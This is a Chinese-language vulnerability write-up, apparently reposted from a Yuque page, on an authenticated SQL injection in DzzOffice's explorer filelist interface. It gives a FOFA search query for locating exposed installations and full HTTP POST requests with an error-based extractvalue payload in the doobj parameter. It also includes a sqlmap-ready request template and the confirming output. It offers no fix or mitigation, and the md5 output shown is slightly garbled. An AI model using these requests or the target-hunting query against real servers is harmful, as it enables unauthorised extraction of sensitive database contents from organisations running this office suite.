登录 白背景

DzzOffice 办公软件explorer存在后台SQL注入漏洞

一、漏洞简介

DzzOffice是一套开源办公套件,适用于企业、团队搭建自己的 类似“Google企业应用套件”、“微软Office365”的企业协同办公平台。DzzOffice办公软件/index.php?mod=explorer&op=dynamic&do=filelist接口处存在sql注入,攻击者可利用此漏洞获取数据库敏感信息。

二、影响版本

  • DzzOffice 办公软件

三、资产测绘

  • fofaicon_hash="-1961736892" && body="立即注册"
  • 特征

image.png

四、漏洞复现

  1. 先注册用户登录系统获取cookie

image.png

  1. 使用上一步获取的cookie进行测试
POST /index.php?mod=explorer&op=dynamic&do=filelist HTTP/1.1
Host: 
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: akJE_2132_saltkey=HZqrxEwb; akJE_2132_lastvisit=1713857672; akJE_2132_sid=q4j3kC; akJE_2132_lastact=1713861417%09misc.php%09sendwx; akJE_2132_sendmail=1; akJE_2132_seccodeSq4j3kC0=7bffgd26MmkE4-rOPQ9VfbprQFV8PwAkCCjx5QZA6zAv6YsABrolmPVfaWUsgEll8pBoBGXWYUfggaQvhpI; akJE_2132_ulastactivity=fc220wt12skKHnpuLZPCe1ubsZNVO6t2RNk2lO7fTViXnUmpvbEe; akJE_2132_auth=4b76EdNAavVzuCX3-9iIfBkeySRJefIX48pqsRTSbMgkVylOhANDtDsf_VKUbxlmOp2fLZ4IZGguwJGGT9WeXg; akJE_2132_explorer_index_isshow=show
Connection: close

doobj=' and extractvalue(1,concat(0x7e,md5(1))) and '1'='1&doevent=&uids%5B%5D=1&startdate=&enddate=&disp=&asc=&page=0

image.png

c4ca4238a0b923820dcc509a6f75849

sqlmap

POST /index.php?mod=explorer&op=dynamic&do=filelist HTTP/1.1
Host: 
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: akJE_2132_saltkey=HZqrxEwb; akJE_2132_lastvisit=1713857672; akJE_2132_sid=q4j3kC; akJE_2132_lastact=1713861417%09misc.php%09sendwx; akJE_2132_sendmail=1; akJE_2132_seccodeSq4j3kC0=7bffgd26MmkE4-rOPQ9VfbprQFV8PwAkCCjx5QZA6zAv6YsABrolmPVfaWUsgEll8pBoBGXWYUfggaQvhpI; akJE_2132_ulastactivity=fc220wt12skKHnpuLZPCe1ubsZNVO6t2RNk2lO7fTViXnUmpvbEe; akJE_2132_auth=4b76EdNAavVzuCX3-9iIfBkeySRJefIX48pqsRTSbMgkVylOhANDtDsf_VKUbxlmOp2fLZ4IZGguwJGGT9WeXg; akJE_2132_explorer_index_isshow=show
Connection: close

doobj=1&doevent=&uids%5B%5D=1&startdate=&enddate=&disp=&asc=&page=0

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/ya74hdqsmxtzaah8